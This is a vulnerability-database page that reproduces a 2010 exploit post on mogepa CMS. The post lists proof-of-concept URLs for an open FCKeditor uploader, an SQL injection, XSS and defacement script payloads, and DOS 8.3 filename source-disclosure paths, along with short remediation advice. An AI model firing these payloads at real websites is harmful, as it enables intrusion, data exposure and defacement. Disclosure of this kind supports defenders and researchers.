Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

mogepa Cms Multiple Vulnerabilities

🗓️ 27 Aug 2010 00:00:00Reported by indoushkaType 
zdt
 zdt🔗 0day.today👁 31 Views

mogepa CMS Multiple Vulnerabilities including FcKeditor Uploader, SQL injection, XSS, and DOS filename source code disclosure

Code
===================================
mogepa Cms Multiple Vulnerabilities
===================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor:  http://mogepa.altervista.org/

# Date: 2010-05-27 

# Author : indoushka 

# R.I.P : www.Milw0rm.com,www.Tryag.cc,www.dz-security.com ! 

# Contact : 00213771818860

# Home : www.is3cur1ty.com

# Bug  : Mullti

# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 

FcKeditor Uploader :

1 - http://127.0.0.1/mogepa/admin/fckeditor/editor/filemanager/connectors/

Sample displays a normal HTML form with an FCKeditor - JavaScript  with full features enabled

2 - http://127.0.0.1/mogepa/admin/fckeditor/_samples/default.html

    http://127.0.0.1/mogepa/admin/fckeditor/

SQL injection

3 - http://127.0.0.1:80/mogepa/?p=%2527

XSS 

4 - http://127.0.0.1/mogepa/[email protected]<ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>.com

(SQl/html)

5 - http://127.0.0.1/mogepa/admin/login.php/>"><marquee><font%20color=red%20size=15>Hacked%20By%20indoushka</font></marquee>

6 - 8.3 DOS filename source code disclosure

Vulnerability description:

It's possible to access the source code for this script by using the 8.3 DOS filename notation. 
All 32-bit Microsoft Windows operating systems (commonly known as Win32) can associate two different file names with a stored file, a short name and a long name. The short version, known as 8.3-compliant, is restricted to a length of 8 characters and an extension of 3 characters. This version is required for backward compatibility with DOS. The long version of the file name is not restricted to the 8.3-compliant format but is restricted to a total length of 255 characters.
When Win32 stores a file with a short name (i.e., 8.3-compliant), it associates only that short file name with the file. However, when Win32 stores a file with a long name (i.e., greater than 8 characters), it associates two versions of the file name with the file--the original, long file name and an 8.3-compliant short file name that is derived from the long name in a predictable manner.

Affected items:

/mogepa/admin/fckeditor/_samples/asp/SAMPLE~1.ASP 
/mogepa/admin/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/SPELLC~1.PL 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CLASS_~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CONFIG.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CONNEC~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/IO.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/UPLOAD.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/UTIL.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/CONNEC~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/CONNEC~1.CGI 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/UPLOAD.CGI 
/mogepa/admin/fckeditor/FCKEDI~1.ASP 

The impact of this vulnerability:

An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to launch further attacks.

How to fix this vulnerability:

Install the latest patches on your server.

7 - Source code disclosure:

Vulnerability description:

Looks like the source code for this script is available. This check is using pattern matching to determine if server side tags are found in the file. In some cases this alert may generate false positives. 

Affected items:

/mogepa/admin/fckeditor/_samples/afp/fck.afpa.code 
/mogepa/admin/fckeditor/_samples/afp/sample01.afp 
/mogepa/admin/fckeditor/_samples/afp/sample02.afp 
/mogepa/admin/fckeditor/_samples/afp/sample03.afp 
/mogepa/admin/fckeditor/_samples/afp/sample04.afp 
/mogepa/admin/fckeditor/_samples/afp/sampleposteddata.afp 
/mogepa/admin/fckeditor/_samples/asp/SAMPLE~1.ASP 
/mogepa/admin/fckeditor/_samples/asp/sample01.asp 
/mogepa/admin/fckeditor/_samples/asp/sample02.asp 
/mogepa/admin/fckeditor/_samples/asp/sample03.asp 
/mogepa/admin/fckeditor/_samples/asp/sample04.asp 
/mogepa/admin/fckeditor/_samples/asp/sampleposteddata.asp 
/mogepa/admin/fckeditor/_samples/perl/sample01.cgi 
/mogepa/admin/fckeditor/_samples/perl/sample02.cgi 
/mogepa/admin/fckeditor/_samples/perl/sample03.cgi 
/mogepa/admin/fckeditor/_samples/perl/sample04.cgi 
/mogepa/admin/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/SPELLC~1.PL 
/mogepa/admin/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.pl 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/basexml.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CLASS_~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/class_upload.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/commands.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/config.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/CONNEC~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp (GET Command=GetFolders&Type=File&CurrentFolder=/) 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp (GET Command=GetFoldersAndFiles&Type=File&CurrentFolder=/) 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/io.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/asp/util.asp 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/config.ascx 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/CONNEC~1.ASP 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx 
/mogepa/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/CONNEC~1.CGI 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/connector.cgi 
/mogepa/admin/fckeditor/editor/filemanager/connectors/perl/upload.cgi 
/mogepa/admin/fckeditor/FCKEDI~1.ASP 
/mogepa/admin/fckeditor/fckeditor.afp 
/mogepa/admin/fckeditor/fckeditor.asp 

The impact of this vulnerability:

An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to conduct further attacks.

How to fix this vulnerability:

Remove this file from your website or change its permissions to remove access.

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Aug 2010 00:00Current
7.1High risk
Vulners AI Score7.1
mogepa cmsmultiple vulnerabilitiesfckeditor uploadersql injectionxssdos8.3 dos filename
31